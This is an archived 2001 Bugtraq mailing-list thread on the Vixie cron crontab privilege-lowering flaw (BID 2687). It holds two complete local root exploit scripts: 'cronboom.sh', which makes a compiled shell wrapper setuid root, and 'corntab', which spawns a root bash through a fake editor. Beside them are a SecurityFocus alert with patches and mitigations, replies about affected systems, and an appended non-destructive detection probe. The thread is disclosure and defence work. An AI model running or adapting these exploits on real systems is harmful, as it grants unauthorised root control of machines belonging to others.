6468468 2001-05-07 16:08 -0600 /17 lines/ Cade Cairns <cairnsc@SECURITYFOCUS.COM>
Sent by: joel@lysator.liu.se
Imported: 2001-05-08 17:38 by Brevbäraren
External recipient: BUGTRAQ@SECURITYFOCUS.COM
External replies to: cairnsc@SECURITYFOCUS.COM
Recipient: Bugtraq (import) <16915>
Subject: Vixie cron vulnerability
------------------------------------------------------------
Greetings Bugtraqers,

Attached is a simple proof of concept for the vixie cron vulnerability
recently published in Debian Security Advisory DSA-054-1. The code was
written during SIA analysis of this vulnerability.

Further information on the vulnerability may be found in the SecurityFocus
SIA commercial alert, also attached to this message.

Cade Cairns
SecurityFocus
http://www.securityfocus.com/
(6468468) /Cade Cairns <cairnsc@SECURITYFOCUS.COM>/(Rewrapped)
Attachment (text/plain) in text 6468469
Attachment (text/plain) in text 6468470
Comment in text 6469468 by Edwin Chiu <Edwin.Chiu@E-WARES.COM>
Comment in text 6469755 by Michal Zalewski <lcamtuf@COREDUMP.CX>

6468469 2001-05-07 16:08 -0600 /83 lines/ Cade Cairns <cairnsc@SECURITYFOCUS.COM>
Attachment filename: "cronboom.sh"
Imported: 2001-05-08 17:38 by Brevbäraren
External recipient: BUGTRAQ@SECURITYFOCUS.COM
External replies to: cairnsc@SECURITYFOCUS.COM
Recipient: Bugtraq (import) <16916>
Attachment (text/plain) to text 6468468
Subject: Attachment (cronboom.sh) to: Vixie cron vulnerability
------------------------------------------------------------
#!/bin/sh
#
# cronboom - simple proof-of-concept exploit for vixie cron version 3.0pl1
#
# synopsis:
#   the crontab file maintenance program (crontab) fails to drop privileges
#   before invoking the editor under certain circumstances.
#
# description:
#   a serialization error exists in some versions of the file maintenance
#   program, crontab. the vulnerability was introduced in versions which
#   were patched for a separate vulnerability in fall of 2000 (see Bugtraq
#   ID #1960).
#
#   when a parsing error occurs after a modification operation, crontab will
#   fail to drop privileges correctly for subsequent modification operations.
#   because the program is installed setuid root, it may be possible for a
#   local user to gain root privileges.
#
# affected versions:
#   cron_3.0pl1-57.2 distributed with Debian Linux 2.2.
#
#   note that copies of the program with the patch mentioned above are likely
#   to also be vulnerable.
#
# references:
#   http://www.securityfocus.com/bid/2687
#
# 05/07/01 cairnsc@securityfocus.com

CRONTAB=/usr/bin/crontab

if ! test -x $CRONTAB; then
	echo "** unable to locate crontab executable, exiting"
	exit 1
fi

# shell wrapper: once the privileged editor run has made it setuid root,
# executing it gives a root shell
cat > vcsh.c << EOF
#include <unistd.h>

int main()
{
	setuid(0);
	setgid(0);
	execl("/bin/sh", "sh", NULL);
	return 1;
}
EOF

echo "** compiling shell wrapper as $PWD/vcsh"
cc -o $PWD/vcsh $PWD/vcsh.c

if ! test -x $PWD/vcsh; then
	echo "** compilation failed, exiting"
	exit 1
fi

# fake editor handed to crontab -e. every run appends "foo" to the temp file
# (\$1, escaped so it is expanded when the editor runs, not here) so that
# crontab hits a parse error and offers to retry. the first run, with the
# user's privileges, only drops the vcboom marker; the second run, which
# crontab starts without lowering privileges, makes vcsh setuid root.
echo "** creating simple exploit script as $PWD/vcex.sh"
cat > vcex.sh << EOF
#!/bin/sh
sleep 1 && echo "foo" >> \$1
if test -f $PWD/vcboom; then
	chown root.root $PWD/vcsh
	chmod 4755 $PWD/vcsh
	rm $PWD/vcboom
else
	touch $PWD/vcboom
fi
EOF
chmod 0755 $PWD/vcex.sh

echo "** running $CRONTAB -e"
echo "**"
echo "** enter 'yes' at the first prompt, then enter 'no' at the second"
echo
(EDITOR=$PWD/vcex.sh $CRONTAB -e)
echo
echo "** done, the shell wrapper should be suid root"

exit 0
(6468469) /Cade Cairns <cairnsc@SECURITYFOCUS.COM>/(Rewrapped)

6468470 2001-05-07 16:08 -0600 /250 lines/ Cade Cairns <cairnsc@SECURITYFOCUS.COM>
Attachment filename: "SIA-2687.txt"
Imported: 2001-05-08 17:38 by Brevbäraren
External recipient: BUGTRAQ@SECURITYFOCUS.COM
External replies to: cairnsc@SECURITYFOCUS.COM
Recipient: Bugtraq (import) <16917>
Attachment (text/plain) to text 6468468
Subject: Attachment (SIA-2687.txt) to: Vixie cron vulnerability
------------------------------------------------------------
Thank you for using SecurityFocus.com's Security Intelligence Alert (SIA)
Service.
To manage account please visit https://alerts.securityfocus.com/
For questions or comments email us at alerts@securityfocus.com.

---------------------------------------------------------------------------

Security Alert

Subject: Vixie Cron crontab Privilege Lowering Failure Vulnerability

BUGTRAQ ID: 2687
CVE ID: CVE-MAP-NOMATCH
Published: May 07, 2001
Updated: May 07, 2001
Remote: No
Local: Yes
Availability: User Initiated
Authentication: Not Required
Credibility: Vendor Confirmed
Ease: Exploit Available
Class: Serialization Error
Impact: 10.00
Severity: 6.90
Urgency: 7.59
Last Change: Initial analysis.

---------------------------------------------------------------------------

Vulnerable Systems:

Paul Vixie Vixie Cron 3.0pl1
  + Debian Linux 2.2 sparc
  + Debian Linux 2.2 powerpc
  + Debian Linux 2.2 arm
  + Debian Linux 2.2 alpha
  + Debian Linux 2.2 68k
  + Debian Linux 2.2

Non-Vulnerable Systems:

Summary:

Local users can cause Vixie crontab to fail to drop privileges when editing
files. Can lead to full system compromise.

Impact:

Local users can manipulate crontab's lowering of privileges, leading to full
system compromise.

Technical Description:

Vixie cron is an implementation of the popular UNIX program that runs
user-specified programs at periodic scheduled times.

A serialization error exists in some versions of the crontab file maintenance
program. The vulnerability was introduced in versions which were patched for
a separate vulnerability in fall of 2000 (see Bugtraq ID #1960).

When a parsing error occurs after a modification operation, crontab will fail
to drop privileges correctly for subsequent modification operations. Because
the program is installed setuid root, it may be possible for a local user to
gain root privileges.

Attack Scenarios:

An attacker with local access must edit their crontab file and enter a line
that causes the parser to fail. The attacker must then enter 'yes' when
prompted as to whether he or she wishes to attempt to fix the error in the
file. This will cause the editor to be invoked again, but with full
privileges. The attacker could then execute arbitrary commands from the
editor, or overwrite otherwise protected system files.

Exploits:

During SIA analysis of this vulnerability, Cade Cairns
<cairnsc@securityfocus.com> wrote proof-of-concept exploit code.

http://www.securityfocus.com/data/vulnerabilities/exploits/cronboom.sh

Mitigating Strategies:

Restricting local access to the host may prevent unauthorized users from
exploiting this vulnerability.

Restrict access to the cron facility to trusted users via the /etc/cron.allow
and /etc/cron.deny files (man crontab).

Solutions:

For Paul Vixie Vixie Cron 3.0pl1:

Debian upgrade 2.2 alpha cron_3.0pl1-57.3_alpha.deb
  http://security.debian.org/dists/stable/updates/main/binary-alpha/cron_3.0pl1-57.3_alpha.deb

Debian upgrade 2.2 arm cron_3.0pl1-57.3_arm.deb
  http://security.debian.org/dists/stable/updates/main/binary-arm/cron_3.0pl1-57.3_arm.deb

Debian upgrade 2.2 i386 cron_3.0pl1-57.3_i386.deb
  http://security.debian.org/dists/stable/updates/main/binary-i386/cron_3.0pl1-57.3_i386.deb

Debian upgrade 2.2 m68k cron_3.0pl1-57.3_m68k.deb
  http://security.debian.org/dists/stable/updates/main/binary-m68k/cron_3.0pl1-57.3_m68k.deb

Debian upgrade 2.2 ppc cron_3.0pl1-57.3_powerpc.deb
  http://security.debian.org/dists/stable/updates/main/binary-powerpc/cron_3.0pl1-57.3_powerpc.deb

Debian upgrade 2.2 sparc cron_3.0pl1-57.3_sparc.deb
  http://security.debian.org/dists/stable/updates/main/binary-sparc/cron_3.0pl1-57.3_sparc.deb

Credit:

Posted to Bugtraq in a Debian Security Advisory (DSA-054-1) on May 7, 2001.

References:

advisory: Debian DSA-054-1: cron
  http://www.securityfocus.com/advisories/3282

ChangeLog:

May 07, 2001: Initial analysis.

---------------------------------------------------------------------------

HOW TO INTERPRET THIS ALERT

BUGTRAQ ID: This is a unique identifier assigned to the vulnerability by
SecurityFocus.com.

CVE ID: This is a unique identifier assigned to the vulnerability by the CVE.

Published: The date the vulnerability was first made public.

Updated: The date the information was last updated.

Remote: Whether this is a remotely exploitable vulnerability.

Local: Whether this is a locally exploitable vulnerability.

Credibility: Describes how credible the information about the vulnerability
is. Possible values are:
  Conflicting Reports: There are multiple conflicting reports about the
    existence of the vulnerability.
  Single Source: There is a single non-reliable source reporting the
    existence of the vulnerability.
  Reliable Source: There is a single reliable source reporting the existence
    of the vulnerability.
  Conflicting Details: There is consensus on the existence of the
    vulnerability but not its details.
  Multiple Sources: There is consensus on the existence and details of the
    vulnerability.
  Vendor Confirmed: The vendor has confirmed the vulnerability.

Class: The class of vulnerability. Possible values are: Boundary Condition
Error, Access Validation Error, Origin Validation Error, Input Validation
Error, Failure to Handle Exceptional Conditions, Race Condition Error,
Serialization Error, Atomicity Error, Environment Error, and Configuration
Error.

Ease: Rates how easily the vulnerability can be exploited. Possible values
are: No Exploit Available, Exploit Available, and No Exploit Required.

Impact: Rates the impact of the vulnerability. Its range is 1 through 10.

Severity: Rates the severity of the vulnerability. Its range is 1 through 10.
It is computed from the impact rating and remote flag. Remote vulnerabilities
with a high impact rating receive a high severity rating. Local
vulnerabilities with a low impact rating receive a low severity rating.

Urgency: Rates how quickly you should take action to fix or mitigate the
vulnerability. Its range is 1 through 10. It is computed from the severity
rating, the ease rating, and the credibility rating. High severity
vulnerabilities with a high ease rating, and a high confidence rating have a
higher urgency rating. Low severity vulnerabilities with a low ease rating,
and a low confidence rating have a lower urgency rating.

Last Change: The last change made to the vulnerability information.

Vulnerable Systems: The list of vulnerable systems. A '+' preceding a system
name indicates that one of the system components is vulnerable. For example,
Windows 98 ships with Internet Explorer. So if a vulnerability is found in IE
you may see something like:
  Microsoft Internet Explorer
    + Microsoft Windows 98

Non-Vulnerable Systems: The list of non-vulnerable systems.

Summary: A concise summary of the vulnerability.

Impact: The impact of the vulnerability.

Technical Description: The in-depth description of the vulnerability.

Attack Scenarios: Ways an attacker may make use of the vulnerability.

Exploits: Exploit instructions or programs.

Mitigating Strategies: Ways to mitigate the vulnerability.

Solutions: Solutions to the vulnerability.

Credit: Information about who disclosed the vulnerability.

References: Sources of information on the vulnerability.

Related Resources: Resources that might be of additional value.

ChangeLog: History of changes to the vulnerability record.

---------------------------------------------------------------------------

Copyright 2001 SecurityFocus.com

Thank you for using SecurityFocus.com's Security Intelligence Alert (SIA)
Service.

To manage your account please visit https://alerts.securityfocus.com/
For questions or comments email us at alerts@securityfocus.com.
(6468470) /Cade Cairns <cairnsc@SECURITYFOCUS.COM>/(Rewrapped)

6469468 2001-05-08 13:44 -0400 /34 lines/ Edwin Chiu <Edwin.Chiu@E-WARES.COM>
Sent by: joel@lysator.liu.se
Imported: 2001-05-08 22:45 by Brevbäraren
External recipient: BUGTRAQ@SECURITYFOCUS.COM
External replies to: Edwin.Chiu@E-WARES.COM
Recipient: Bugtraq (import) <16922>
Comment on text 6468468 by Cade Cairns <cairnsc@SECURITYFOCUS.COM>
Subject: Re: Vixie cron vulnerability
------------------------------------------------------------
From: Edwin Chiu <Edwin.Chiu@E-WARES.COM>
To: BUGTRAQ@SECURITYFOCUS.COM
Message-ID: <3AF83087.B0D2765@e-wares.com>

FYI

The exploit failed for:

Redhat 6.1
vixie-cron-3.0.1-39

Redhat 6.2
vixie-cron-3.0.1-40

Regards,
Edwin

Cade Cairns wrote:

> Greetings Bugtraqers,
>
> Attached is a simple proof of concept for the vixie cron vulnerability
> recently published in Debian Security Advisory DSA-054-1. The code was
> written during SIA analysis of this vulnerability.
>
> Further information on the vulnerability may be found in the SecurityFocus
> SIA commercial alert, also attached to this message.
>
> Cade Cairns
> SecurityFocus
> http://www.securityfocus.com/
(6469468) /Edwin Chiu <Edwin.Chiu@E-WARES.COM>/-----
Comment in text 6469713 by Jay D. Dyson <jdyson@TREACHERY.NET>

6469713 2001-05-08 14:01 -0700 /39 lines/ Jay D. Dyson <jdyson@TREACHERY.NET>
Sent by: joel@lysator.liu.se
Imported: 2001-05-09 00:05 by Brevbäraren
External recipient: BUGTRAQ@SECURITYFOCUS.COM
External replies to: jdyson@treachery.net
Recipient: Bugtraq (import) <16923>
Comment on text 6469468 by Edwin Chiu <Edwin.Chiu@E-WARES.COM>
Subject: Re: Vixie cron vulnerability
------------------------------------------------------------
From: "Jay D. Dyson" <jdyson@TREACHERY.NET>
To: BUGTRAQ@SECURITYFOCUS.COM
Message-ID: <Pine.GSO.3.96.1010508135756.3740B-100000@crypto>

-----BEGIN PGP SIGNED MESSAGE-----

On Tue, 8 May 2001, Edwin Chiu wrote:

> The exploit failed for:
> Redhat 6.1
> vixie-cron-3.0.1-39
> Redhat 6.2
> vixie-cron-3.0.1-40

	*nod*  I wrote to Cade directly regarding the advisory as it seems
to me that the issue is more a matter of Debian's implementation of Vixie
cron than an issue with Vixie cron itself.

	I'm still futzing with it to see if any other implementations will
squeal.  Fun and interesting results will be posted when found.  ;)

- -Jay

   (                                     (
 _______ ))                              ))       .- "There's always time for a good cup of coffee" -.   >====<--.
 C|~~|C|~~|   (>------ Jay D. Dyson -- jdyson@treachery.net ------<)                                    | = |-'
  `--' `--'    `---------- "Si vis pacem, para bellum." ----------'                                     `------'

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: See http://www.treachery.net/~jdyson/ for current keys.

iQCVAwUBOvhQldCClfiU/BIVAQECcgP/fnDkOGxVAm6S+UKnCS5Kmdjnl67nVYGf
IFaWyv9JKF82A7E7L0PBI9hTe27YvyhamFDBVIDAu79n1AszxXUt7g+F0WEuHtpy
gBegB1+KnJCq8vzzdB9kBmCAe+XeILaG49BvACOcvww2AJN0YZhHu3ZA5COtWwhF
QxBGcf+6MFw=
=pGCW
-----END PGP SIGNATURE-----
(6469713) /Jay D. Dyson <jdyson@TREACHERY.NET>/(Rewrapped)

6469755 2001-05-08 11:30 -0400 /18 lines/ Michal Zalewski <lcamtuf@COREDUMP.CX>
Sent by: joel@lysator.liu.se
Imported: 2001-05-09 00:24 by Brevbäraren
External recipient: BUGTRAQ@SECURITYFOCUS.COM
External replies to: lcamtuf@COREDUMP.CX
Recipient: Bugtraq (import) <16924>
Comment on text 6468468 by Cade Cairns <cairnsc@SECURITYFOCUS.COM>
Subject: Re: Vixie cron vulnerability
------------------------------------------------------------
On Mon, 7 May 2001, Cade Cairns wrote:

> Attached is a simple proof of concept for the vixie cron vulnerability
> recently published in Debian Security Advisory DSA-054-1. The code was
> written during SIA analysis of this vulnerability.
Hm, there is my original proof-of-concept I coded for Sebastian Krahmer (who
discovered this vulnerability), while working on it. This vulnerability
affects Debian, SuSE, and probably a few other Linuxes as well. It is a
perfect example of bad coding, and how improper fixing of bugs might lead to
even more dangerous conditions. It is fully automated, and I believe it gives
absolutely nothing to the attacker, as this vulnerability can be exploited by
hand in approximately 5 seconds ;)

Michal Zalewski
http://lcamtuf.coredump.cx
(6469755) /Michal Zalewski <lcamtuf@COREDUMP.CX>/(Rewrapped)
Attachment (text/plain) in text 6469756

6469756 2001-05-08 11:30 -0400 /88 lines/ Michal Zalewski <lcamtuf@COREDUMP.CX>
Attachment filename: "corntab"
Imported: 2001-05-09 00:24 by Brevbäraren
External recipient: BUGTRAQ@SECURITYFOCUS.COM
External replies to: lcamtuf@COREDUMP.CX
Recipient: Bugtraq (import) <16925>
Attachment (text/plain) to text 6469755
Subject: Attachment (corntab) to: Re: Vixie cron vulnerability
------------------------------------------------------------
#!/bin/bash

clear
echo ".-----------------------------------------------------------."
echo "| Marchew.Hyperreal presents: vixie crontab exploit #728371 |"
echo "|===========================================================|"
echo "| Sebastian Krahmer <krahmer@security.is>                   |"
echo "| Michal Zalewski <lcamtuf@coredump.cx>                     |"
echo "\`-----------------------------------------------------------'"
echo

# CRONBIN may be overridden in the environment
test "$CRONBIN" = "" && CRONBIN=/usr/bin/crontab

echo ">>> Using binary: $CRONBIN"

echo -n ">>> Setuid check: "
if [ -u $CRONBIN ]; then
  echo "PASSED"
else
  echo "FAILED"
  echo
  exit 1
fi

# the vulnerable builds carry this RCS id string
echo -n ">>> Version check: "
QQ=`strings $CRONBIN | grep '43 vixie Exp'`
if [ "$QQ" = "" ]; then
  echo "FAILED"
  echo
  exit 1
else
  echo "PASSED"
fi

echo ">>> Building exploit..."

# fake editor. $HOME below is expanded by the shell while writing the source.
cat >edit0r.c <<_eof_
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

int main(int argc,char* argv[]) {
  sleep(1);
  if (geteuid()) {
    /* first run, as the user: leave an unparsable crontab so that crontab
       reports an error and asks whether to retry */
    FILE* x=fopen(argv[1],"w");
    fprintf(x,"blah blah blah\n");
    fclose(x);
  } else {
    /* second run: crontab re-invoked the editor without lowering privileges.
       stdin is the "y"/"n" pipe, so point the shell's stdin/stderr at the tty */
    dup2(1,0);
    dup2(1,2);
    printf("\n>>> Entering rootshell, babe...\n");
    system("touch $HOME/.xploited");
    system("bash");
  }
  return 0;
}
_eof_

gcc edit0r.c -o edit0r &>/dev/null
rm -f edit0r.c

if [ ! -f edit0r ]; then
  echo ">>> Cannot compile exploit."
  echo
  exit 1
fi

rm -f ~/.xploited

echo ">>> Performing attack..."

# "y" at the first prompt makes crontab re-run the editor, "n" at the second
# abandons the edit
( echo "y"; echo "n" ) | VISUAL=$PWD/edit0r $CRONBIN -e 2>/dev/null

rm -f edit0r

if [ -f ~/.xploited ]; then
  echo
  echo ">>> Thank you."
  rm -f ~/.xploited
  echo
  exit 0
else
  echo
  echo ">>> Apparently I am not able to exploit it, sorry..."
  echo
  exit 1
fi
(6469756) /Michal Zalewski <lcamtuf@COREDUMP.CX>/---
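Both posted exploits rest on the same observation as the SIA alert's attack scenario: the editor that crontab -e starts after the "retry?" prompt runs with euid 0 while the first one ran as the user. That observation can be turned into a non-destructive audit. The script below is an added example written for this page, not code from the thread or from the cron package. It assumes a setuid-root crontab at /usr/bin/crontab that honours VISUAL and reads the prompt answer from stdin, as the exploits above do; the function names (write_probe_editor, judge_probe_log, run_probe), the probe editor and the "<invocation> <euid> <ruid>" log format are this example's own. Unlike the exploits it does not chown or spawn anything: the fake editor only records the ids it runs with, and answering "y" then "n" leaves the user's real crontab untouched.

```shell
#!/bin/sh
# cron-euid-probe.sh: non-destructive check for the crontab privilege-lowering
# failure described in BID 2687 / DSA-054-1. Added example for this page, not
# code from the thread or from the cron package. Assumes a setuid-root crontab
# (default /usr/bin/crontab) that honours VISUAL and reads the "retry?" answer
# from stdin, exactly as the two posted exploits do.

# write_probe_editor EDITOR_PATH LOGFILE
#   Creates the fake editor. On every invocation it appends one line
#   "<invocation> <euid> <ruid>" to LOGFILE, then appends a line crontab
#   cannot parse to the temp file it was handed, so crontab reports an error
#   and prompts. Nothing is ever installed: "n" at the second prompt abandons
#   the edit. LOGFILE is expanded now; \$1, \$(...) and \$((...)) are escaped
#   so they are evaluated when the editor runs.
write_probe_editor() {
    cat > "$1" <<EOF
#!/bin/sh
n=\$(awk 'END { print NR }' "$2")
echo "\$((n + 1)) \$(id -u) \$(id -ru)" >> "$2"
echo "this line is not a valid crontab entry" >> "\$1"
EOF
    chmod 0755 "$1"
}

# judge_probe_log LOGFILE
#   Exit 0: vulnerable (an editor run after the first had euid 0 while the
#           real uid was not root, i.e. privileges were not lowered again).
#   Exit 1: not vulnerable (every re-run kept the caller's euid).
#   Exit 2: inconclusive (fewer than two runs recorded, e.g. no retry prompt).
#   A root caller (euid 0 and ruid 0 on every run) is deliberately not counted.
judge_probe_log() {
    awk '
        NR > 1 && $2 == 0 && $3 != 0 { bad = 1 }
        END {
            if (NR < 2) exit 2
            exit bad ? 0 : 1
        }' "$1"
}

# run_probe [CRONTAB_BIN]
#   Drives "crontab -e" the way the exploits do: "y" at the first prompt makes
#   crontab re-run the editor, "n" at the second abandons the edit. Must run
#   as an unprivileged user; root legitimately sees euid 0 on every run.
run_probe() {
    crontab_bin=${1:-/usr/bin/crontab}
    if [ "$(id -u)" -eq 0 ]; then
        echo "run this as an unprivileged user" >&2
        return 2
    fi
    workdir=$(mktemp -d) || return 2
    log="$workdir/probe.log"
    : > "$log"
    write_probe_editor "$workdir/probe-editor.sh" "$log"
    printf 'y\nn\n' | VISUAL="$workdir/probe-editor.sh" "$crontab_bin" -e >/dev/null 2>&1 || :
    rc=0
    judge_probe_log "$log" || rc=$?
    rm -rf "$workdir"
    return $rc
}

# Usage: sh cron-euid-probe.sh --run [/path/to/crontab]
if [ "${1:-}" = "--run" ]; then
    rc=0
    run_probe "$2" || rc=$?
    case $rc in
        0) echo "VULNERABLE: editor re-run with euid 0 (BID 2687)" ;;
        1) echo "not vulnerable: every editor run kept the user's euid" ;;
        *) echo "inconclusive: editor was not re-run (no retry prompt?)" ;;
    esac
fi
```

The verdict is taken from the ids the editor itself observed rather than from a side effect such as a chowned binary, so a positive result is direct evidence of the missing privilege drop and a negative one does not depend on the editor having had write access anywhere. If crontab never re-runs the editor (a fixed build, or one that aborts instead of prompting) the log holds a single line and the probe reports "inconclusive" instead of "not vulnerable".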